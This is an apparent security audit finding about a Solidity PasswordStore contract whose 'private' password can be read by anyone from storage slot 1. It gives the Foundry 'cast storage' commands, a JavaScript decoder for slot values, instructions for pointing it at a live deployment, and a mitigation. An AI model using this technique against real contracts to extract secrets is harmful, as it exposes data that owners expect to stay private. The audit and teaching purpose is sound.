Contrary to popular belief, `private` storage variables in Solidity are not hidden from the public. All contract storage is readable by anyone on the blockchain. Anyone can inspect storage slot 1 of the PasswordStore contract to retrieve the password.
As highlighted above, storage slot 1 is visible to anyone on the blockchain. Foundry provides the `cast storage` command to read the value of a specific storage slot. In a JavaScript environment, `web3.eth.getStorageAt` from the web3.js library does the same.
The `cast` command that enabled me to retrieve the password is `cast storage <contract-address> <slot>`, followed by `cast parse-bytes32-string <hex-value>` on the returned value:
- `0x5fbdb2315678afecb367f032d93f642f64180aa3` is the address of the deployed contract.
- `1` is the index of the storage slot that holds the password (state variables are assigned slots in declaration order).
- `parse-bytes32-string` is a `cast` utility that converts the returned 32-byte hex value into a string.
The protocol explicitly states that users other than the owner should not have access to the password. Our findings demonstrate that ANY user can retrieve the password with a single storage read; no transaction, no ownership and no call to `getPassword` is required.
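The following is an added example, not code from the original finding or from the PasswordStore project. It reproduces offline what the `cast storage` / `cast parse-bytes32-string` pair does: given the raw 32-byte values of slots 0 and 1, it decodes the owner address and the password string. It assumes the layout the finding describes (slot 0 holds the owner address, slot 1 holds the `private` password string); the slot values it operates on are constructed inputs, not values read from a chain. It also goes slightly beyond the page by handling the length byte Solidity puts in the slot and by flagging strings longer than 31 bytes, which are stored at `keccak256(slot)` and need one more read.

```javascript
// Added example (not the finding's or PasswordStore's own code).
// Assumed storage layout: slot 0 = address s_owner, slot 1 = string s_password.
// All slot values below are constructed for the example.

// Normalise a `cast storage` style value ("0x" + up to 64 hex chars) to 32 bytes.
function toSlotBuffer(hexSlot) {
  const hex = hexSlot.replace(/^0x/, "").padStart(64, "0");
  if (hex.length !== 64) throw new Error("expected a 32-byte slot value");
  return Buffer.from(hex, "hex");
}

// Solidity stores a string of <= 31 bytes inside its own slot: the bytes are
// left-aligned and the lowest byte holds 2 * length (an even value).
function encodeShortString(s) {
  const data = Buffer.from(s, "utf8");
  if (data.length > 31) throw new Error("long strings use the keccak256(slot) pointer form");
  const slot = Buffer.alloc(32);
  data.copy(slot, 0);
  slot[31] = data.length * 2;
  return "0x" + slot.toString("hex");
}

// Classify a string slot. Long strings (> 31 bytes) store 2 * length + 1 here
// and keep their bytes at keccak256(uint256(slotIndex)) and the slots after it,
// so an attacker simply performs one more `cast storage` read.
function stringSlotKind(hexSlot) {
  const slot = toSlotBuffer(hexSlot);
  if (slot[31] & 1) {
    const length = (BigInt("0x" + slot.toString("hex")) - 1n) / 2n;
    return { kind: "long", length: Number(length) };
  }
  return { kind: "short", length: slot[31] / 2 };
}

// Exact decoding of a short Solidity string slot, using the length byte.
function decodeStringSlot(hexSlot) {
  const { kind, length } = stringSlotKind(hexSlot);
  if (kind === "long") {
    throw new Error(`long string of ${length} bytes: read keccak256(slot) and following slots`);
  }
  return toSlotBuffer(hexSlot).subarray(0, length).toString("utf8");
}

// What `cast parse-bytes32-string` does: take the bytes up to the first NUL.
// For short strings this agrees with decodeStringSlot because the padding
// between the text and the length byte is all zeros.
function parseBytes32String(hexSlot) {
  const slot = toSlotBuffer(hexSlot);
  const end = slot.indexOf(0);
  return slot.subarray(0, end === -1 ? slot.length : end).toString("utf8");
}

// Decode a dump of the form { slotIndex: hexValue } as returned by
// `cast storage <addr> <slot>` for slots 0 and 1. Note what is absent:
// no key, no signature, no owner check. Anyone with an RPC endpoint gets this.
function decodePasswordStore(dump) {
  const owner = "0x" + toSlotBuffer(dump[0]).subarray(12).toString("hex");
  const password = decodeStringSlot(dump[1]);
  return { owner, password };
}

// Constructed sample dump (not real chain data).
const SAMPLE_DUMP = {
  0: "0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266",
  1: encodeShortString("myPassword"),
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(decodePasswordStore(SAMPLE_DUMP));
}
```

To use it against a live deployment, replace `SAMPLE_DUMP` with the two values returned by `cast storage <address> 0` and `cast storage <address> 1` (or by `web3.eth.getStorageAt`); the decoding is identical because storage contents are the same for every reader.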
Tools used: Foundry with `cast`.
One possible mitigation is to store an encrypted form of the password rather than its plaintext. The encryption key must stay off-chain: calldata and storage are as public as the slot itself, so the contract can only hold ciphertext, and `getPassword` would return ciphertext for the owner to decrypt locally. Implementing this would likely require a significant refactor of any front end associated with this contract.
As the Solidity documentation puts it: private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this context, `private` does not mean secret or confidential.